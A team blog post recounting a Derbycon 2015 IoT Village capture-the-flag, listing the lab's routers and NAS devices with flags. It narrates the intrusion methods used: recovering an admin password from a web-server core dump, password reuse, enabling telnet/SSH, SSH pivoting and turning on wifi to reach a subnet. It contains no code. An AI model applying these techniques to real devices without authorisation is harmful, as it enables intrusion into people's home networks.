Sorry, We are not Recruiting!

We are not actively recruiting at this time. We may have spots open after CSAW.

(updated: 3/22/2018)

Wednesday, October 7, 2015

Debycon IoT Village CTF

Due to winning the BSidesCharm Wireless CTF, I missed out on Independent Security Evaluators' SOHO Router Hacking Workshop, which was a very enticing subject for me. I also missed out on attending Defcon due to a job change, and thus missed out on the IoT Village by the same organization. Come Derbycon, I was determined to attend their session. Sadly, they weren't holding workshops at this convention.

I initially settled for capturing packets from their lab of IoT devices for a future post for the I See Dead Packets blog. I did capture a bunch of NetUSB broadcasts along with other protocols, which will lead into a future post.

As for the CTF itself, the network was split into three networks, with the participants directly attached to the initial network. Many of the devices on Network 2 & 3 had misconfigured gateways, so the only way to reach them was to pivot through another compromised system on that subnet. I've broken the device list by the networks they were found on, and added links to ISE's case studies (which include exploits).

Network 1
TP-Link TL-WR1043ND FLAG: (md5 of /dev/mtdblock1) - 1000 points
Belkin F5D8236-4v2 FLAG: password hash & settings page screenshot - 1000 points
Netgear WNR3500Lv2 FLAG: (md5 of /dev/mtd1) - 1000 points
D-Link DIR-865L FLAG: (md5 of /dev/mtd0) - 1000 points
Trendnet TEW-812DRU FLAG: (md5 of /dev/mtdblock0) - 1000 points
Asus RT-AC66U FLAG: (md5 of /dev/mtdblock2) - 1000 points
Trendnet TN-200 FLAG: (md5 of /dev/mtd0) - 1000 points

Network 2
D-Link DNS-345 FLAG: (md5 of /dev/mtd0) - 2000 points
Seagate SRN02D FLAG: (md5 of /dev/mtd0) - 2000 points
PogoPlug Mobile FLAG: (md5 of /dev/mtd0) - 2000 points
Belkin F7D7301v1 FLAG: password hash & settings page screenshot - 2000 points
Netgear WNDR4700 FLAG: (md5 of /dev/mtd1) - 2000 points

Network 3
WD My Cloud EX4 FLAG: (md5 of /dev/mtd0) - 3000 points
Netgear ReadyNAS (FLAG: md5 of /dev/mtd0) - 3000 points
Belkin F9K1104v1 FLAG: password hash & settings page screenshot - 3000 points
Cisco (Linksys EA6500) FLAG: (md5 of /dev/mtdblock0) - 3000 points

Additionally a host on Network 1 was configured as an admin that would also click any link sent to it, supporting many of the CSRF vulnerabilities discovered by ISE.

Getting admin access to the web interface wasn't enough as most of the flags required access to the underlying Linux system. The real challenge I found, wasn't in exploiting the systems, but rather hashing or exfiltrating the file for hashing. Protip: have md5sum/openssl, utelnetd, and uftpd compiled for both ARM and MIPS systems.

Fortune smiled upon me early on as I crashed a webserver on one of the devices I was attempting to exploit. I was able to transfer the core dump via Samba, and recover the admin password used. The passwords of most of the systems followed a similar pattern, and thus without additional exploits, I was able to log into roughly 80% of the devices, and often enable telnet or SSH services.

While many of the systems wifi routers, they were configured with their wireless radio disabled. At one point, when I was frustrated with pivoting through a SSH tunnel, it occurred to me that I could just enable wifi and configure the security key to one of my choosing. This allowed me direct access to Network 3.

Lastly, I'd like to give a shout-out to my rival Powerword Hack, as they were a fun bunch of guys to play against, and made my time at the CTF feel less isolated. It turns out that our skills were complimentary, as we had very few systems that we both scored points on, and often it felt we each had two halves to a puzzle but didn't collaborate due to the competition. Had we joined forces, I feel confident that we could've grabbed every flag in the challenge.

I used the Amazon Gift card from this event to purchase:

I'll end this post with a talk provided by an ISE engineer at Derbycon for those out there who, like myself, are interested in exploring an Internet of Things.

About Crimson Agents

Formed in 2013, Crimson Agents is a DC based recreational security team that competes in various computer security wargames and hacker jeopardy contests. Our team comprised of various professionals seeking to practice and enhance our skills in penetration testing, vulnerability development, computer network defense, forensics, and reverse engineering. In addition to exploitation based CTFs, we also compete in Wireless CTFs with several members who focus solely in this domain. Our sister team Threat Inc focuses on defensive exercises such as malware analysis, forensics, honeypots, and network captures. We reuse what we learn from our "Blue Team" research to make our "Red Team" operations more effective and vice-versa.